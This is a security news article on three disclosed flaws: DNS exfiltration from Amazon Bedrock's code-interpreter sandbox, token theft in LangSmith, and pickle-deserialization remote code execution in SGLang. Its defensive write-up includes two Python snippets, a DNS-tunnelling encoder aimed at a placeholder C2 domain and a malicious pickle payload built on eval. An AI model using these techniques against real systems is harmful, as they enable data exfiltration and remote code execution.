AI Vulnerabilities in Amazon Bedrock, LangSmith, and SGLang Expose Data to Exfiltration and Remote Code Execution
Recent cybersecurity research has unveiled critical vulnerabilities in prominent artificial intelligence (AI) platforms, raising alarms about potential data exfiltration and remote code execution risks. These vulnerabilities affect Amazon’s Bedrock, LangSmith, and SGLang, highlighting the urgent need for enhanced security measures in AI environments.
Exfiltration Risks in Amazon Bedrock
Cybersecurity firm BeyondTrust has reported a significant flaw in the Amazon Bedrock AgentCore Code Interpreter’s sandbox mode, which allows outbound Domain Name System (DNS) queries. This capability can be exploited by attackers to establish interactive shells and circumvent network isolation protocols. The vulnerability, which lacks a Common Vulnerabilities and Exposures (CVE) identifier, has been assigned a CVSS score of 7.5 out of 10.
The Amazon Bedrock AgentCore Code Interpreter is a fully managed service designed to enable AI agents to execute code securely within isolated sandbox environments. Launched in August 2025, the service was intended to prevent agent workloads from accessing external systems. However, the allowance for DNS queries, even under a “no network access” configuration, poses a significant risk. Kinnaird McQuade, Chief Security Architect at BeyondTrust, noted that this oversight could enable threat actors to create command-and-control channels and exfiltrate data via DNS.
In experimental scenarios, an attacker could exploit this behavior to set up a bidirectional communication channel through DNS queries and responses. If the IAM role available to the compromised interpreter permits access to AWS resources, the attacker could exfiltrate sensitive information stored in S3 buckets and execute commands remotely.
Furthermore, the DNS communication mechanism can be manipulated to deliver additional payloads to the Code Interpreter, allowing it to poll DNS command-and-control servers for commands and return results via DNS subdomain queries. This raises concerns about the potential for unauthorized access to sensitive data.
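The mechanics of DNS-based exfiltration described above can be sketched in a few lines. The snippet below is a generic illustration of the encoding step such a channel relies on, not BeyondTrust's proof of concept: data is base32-encoded (a DNS-safe alphabet) and packed into subdomain labels under an attacker-controlled domain, so that merely resolving the resulting hostname carries the payload to the attacker's authoritative nameserver. The domain name `c2.example.com` is a placeholder.

```python
import base64

# DNS limits each label (dot-separated component) to 63 characters.
MAX_LABEL = 63

def encode_for_dns(data: bytes, c2_domain: str) -> str:
    """Pack data into subdomain labels under an attacker-controlled domain."""
    # base32 uses only letters and digits, which are legal in hostnames.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    return ".".join(labels + [c2_domain])

# Resolving this name (e.g. via socket.gethostbyname) would deliver the
# payload to the attacker's nameserver even when all other outbound
# network access is blocked.
query = encode_for_dns(b"secret-token-123", "c2.example.com")
```

This is why allowing outbound DNS, even with every other port closed, effectively leaves an outbound data channel open: the sandbox never connects to the attacker directly, yet the recursive resolver forwards the query on its behalf.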
BeyondTrust emphasized that this research illustrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters. The consequences could range from data breaches to service downtime and the destruction of critical infrastructure.
In response to these findings, Amazon has advised customers to utilize Virtual Private Cloud (VPC) mode instead of sandbox mode for complete network isolation. Additionally, the company recommends implementing a DNS firewall to filter outbound DNS traffic.
LangSmith’s Account Takeover Vulnerability
In a related development, Miggo Security disclosed a high-severity vulnerability in LangSmith, a platform for AI observability. This flaw, identified as CVE-2026-25750 with a CVSS score of 8.5, exposes users to potential token theft and account takeover. The vulnerability affects both self-hosted and cloud deployments and has been addressed in LangSmith version 0.12.71, released in December 2025.
The issue stems from missing validation of the baseUrl parameter, enabling URL parameter injection: by tricking a victim into clicking a malicious link, an attacker could steal the signed-in user's bearer token, user ID, and workspace ID.
Successful exploitation could grant unauthorized access to sensitive AI trace histories, internal SQL queries, customer records, and proprietary source code. Researchers from Miggo noted that a logged-in LangSmith user could be compromised simply by visiting an attacker-controlled site or clicking a malicious link.
SGLang’s Unsafe Pickle Deserialization Flaws
Security vulnerabilities have also been identified in SGLang, an open-source framework for serving large language models and multimodal AI models. These vulnerabilities stem from unsafe pickle deserialization and could result in remote code execution. Discovered by Orca Security researcher Igor Stepansky, the flaws remain unpatched.
Three specific vulnerabilities have been highlighted:
- CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ broker, which deserializes untrusted data without authentication.
- CVE-2026-3060 (CVSS score: 9.8) – Similar to the first, this vulnerability affects the disaggregation module, allowing unauthenticated remote code execution.
- CVE-2026-3989 (CVSS score: 7.8) – This flaw involves the use of an insecure pickle.load() function without proper validation, which can be exploited by providing a malicious pickle file.
The CERT Coordination Center has stated that if either of the first two vulnerable components is reachable, an attacker could exploit the flaw by sending a malicious pickle payload to the broker, which would deserialize it and execute attacker-controlled code.
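The danger of deserializing untrusted pickle data is easy to demonstrate. The snippet below is a generic illustration, not SGLang's code: Python's pickle protocol lets a payload name an arbitrary callable to invoke on load, which is exactly what makes an unauthenticated deserialization endpoint a remote-code-execution primitive. It also sketches one common hardening pattern, a restricted Unpickler that refuses to resolve any global, so object-bearing payloads fail closed.

```python
import io
import pickle

class Malicious:
    """Illustrates how a pickle payload smuggles a callable."""
    def __reduce__(self):
        # On unpickling, this invokes eval() on an attacker-chosen string;
        # a real attacker would use os.system or similar.
        return (eval, ("__import__('os').getcwd()",))

# An attacker ships these bytes to the vulnerable endpoint; calling
# pickle.loads(payload) there would execute the embedded expression.
payload = pickle.dumps(Malicious())

class SafeUnpickler(pickle.Unpickler):
    """Refuses to resolve any global, blocking callable-bearing payloads."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def safe_loads(data: bytes):
    return SafeUnpickler(io.BytesIO(data)).load()
```

Note that restricting find_class only mitigates, and only for payloads that need globals; the more robust fix, reflected in the guidance below, is to keep such endpoints off untrusted networks entirely or replace pickle with a data-only format such as JSON.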
Users of SGLang are advised to restrict access to service interfaces and ensure they are not exposed to untrusted networks. Implementing adequate network segmentation and access controls is crucial to prevent unauthorized interactions with ZeroMQ endpoints.
While there is currently no evidence that these vulnerabilities have been exploited in the wild, vigilance is necessary. Monitoring for unexpected inbound TCP connections to the ZeroMQ broker port, unusual child processes spawned by the SGLang Python process, and unexpected outbound connections is recommended.
The implications of these vulnerabilities extend beyond the individual platforms, underscoring the need for robust security practices across AI development and deployment. As AI technologies become more deeply integrated into business operations, maintaining rigorous security protocols in AI environments is paramount.